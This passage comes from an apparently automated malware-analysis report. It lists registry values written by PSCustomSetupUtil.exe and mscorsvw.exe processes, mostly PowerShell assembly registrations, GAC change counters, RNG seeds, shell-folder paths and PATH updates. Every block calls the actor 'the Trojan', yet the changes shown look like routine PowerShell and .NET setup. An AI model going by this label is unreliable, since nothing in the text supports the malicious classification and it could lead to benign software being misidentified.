"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3320 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 AF D8 D2 8A 00 43 BF 9B 18 99 49 91 AB EA 27"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "EC 26 DE C5 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 89 FC 77 BF 3E 51 6B D5 83 AF FB A5 7D AD 1A"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "2A 0E A1 C4 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:2424 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 04 38 0E C9 8E A5 1C 0A 00 36 26 70 C4 17 54"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "62 8E 6F B6 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:3164 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 C8 C1 22 55 06 6D A2 E0 31 46 3A BF AA 53 2D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "C6 F2 47 C5 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 BD 9A 35 58 02 51 58 91 ED 4D 79 6B 18 2E 0D"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 3E 2B C6 BC BE 80 5E 57 0C EC DF 62 3B EF A3"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "76 00 1D B5 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:2684 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 8B 2B F7 E9 FF 76 1B 90 F9 FA 7C 65 7B EB B4"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "9E C5 6D B8 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 77 33 01 05 C4 3E B1 FE 7D 2F 8E DE 13 41 B2"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "16 9F AF B1 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 57 18 51 D8 08 76 69 67 4E 2F 71 8F F6 C8 E8"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "26 B1 D3 B6 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 96 88 75 BA 68 D1 E5 9A BC B8 C4 0C 13 0D 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 28 41 EB B4 AD A4 B9 07 F9 39 BE E1 34 8F A6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C FB 58 D5 39 1D F8 B1 52 A1 9D AB C1 BB 68 13"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "EE E7 85 B5 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:2588 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 C9 F8 BE FA 3F 61 91 09 A5 36 44 FD 2E E5 71"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "66 56 82 B9 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:3464 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 85 3D D8 2C 8B 87 B3 96 3C 42 C8 83 EA 80 9C"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "7E 52 2E C7 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 52 2A 71 45 82 9F 0C 1A DE 0C 9D B8 B1 07 64"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "72 65 3B B3 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 97 22 F1 BA C2 F3 3F 70 2E 66 AE 5F 49 C7 7F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "28 BB FA B5 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:3392 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 0C 73 22 7D 09 9F 4D 48 16 83 86 CD F4 CE 2B"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "CE CE A8 C6 05 2F D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:780 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 80 75 82 81 70 B9 22 C1 B1 0E 17 3D 58 EB AE"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "A0 48 01 B4 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 E8 72 A1 47 61 73 37 11 37 7D 89 8A BA 28 B3"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "36 96 C6 BA 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 37 A6 2A 1C F8 0E B5 31 56 FC C0 69 6B A2 CB"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "04 B0 95 AE 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:2572 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 4C BC 00 E7 03 F5 6C FA 53 4E BD 2D 8A 4B 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "02 E1 C6 B7 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process mscorsvw.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

